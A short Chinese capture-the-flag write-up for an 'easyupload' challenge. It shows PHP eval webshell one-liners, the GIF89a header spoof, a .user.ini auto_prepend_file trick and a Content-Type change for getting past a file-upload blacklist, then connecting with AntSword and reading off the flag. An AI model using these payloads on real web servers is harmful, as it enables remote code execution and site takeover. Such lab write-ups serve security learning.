CTF之easyupload

拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php

那我们就用<?=eval($_POST['a']);?>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)

但是后缀依然不能绕过怎么办?

接下来就要学新知识了

.user.ini文件

auto_prepend_file可以让所有的php文件自动的包含某个文件。

例如在.user.ini文件中写入

auto_prepend_file=shell.jpg

然后在shell.jpg中写入一个一句话木嘛

<?php eval($_P0ST['aaa']); ?>

那么和.user.ini和shell.jpg同一目录下的所有php文件都会包含shell.jpg文件。

这里上传.user.ini文件

文件里写:auto_prepend_file=a.jpg

注意:要进行抓包将文件类型改成Content-Type: image/jpeg并且也要加GIF89a或者GIF87a

然后再上传一个对应的木马文件,并且后缀为图片类型

最后就是用蚁剑连接了注意连接地址是/uploads/index.php

cyberpeace{8e50e0951cae4b39f7c312da788c71bb}

相关推荐
2401_873479408 小时前
如何利用IP查询定位识别电商刷单?4个关键指标+工具配置方案
开发语言·tcp/ip·php
aq55356009 小时前
Laravel 6.x核心特性深度解析
php·laravel
菩提小狗9 小时前
每日安全情报报告 · 2026-04-20
网络安全·漏洞·cve·安全情报·每日安全
云安全助手10 小时前
2026年AI安全大模型实战指南:快快云安全AI能力全景解析
人工智能·网络安全·claude
aq553560011 小时前
PHP vs Python:30秒看懂核心区别
开发语言·python·php
FreeCultureBoy11 小时前
用 phpbrew 管理 php 环境:从安装到多版本切换
后端·php
zopple13 小时前
ThinkPHP5.x与3.x核心差异解析
java·python·php
zmj32032414 小时前
欧盟 R155 核心范围
网络安全·信息安全
Y学院15 小时前
网络安全基础核心知识点教程
网络·web安全·php
CS创新实验室16 小时前
CS实验室行业报告:安全类岗位就业分析报告
网络安全·信息安全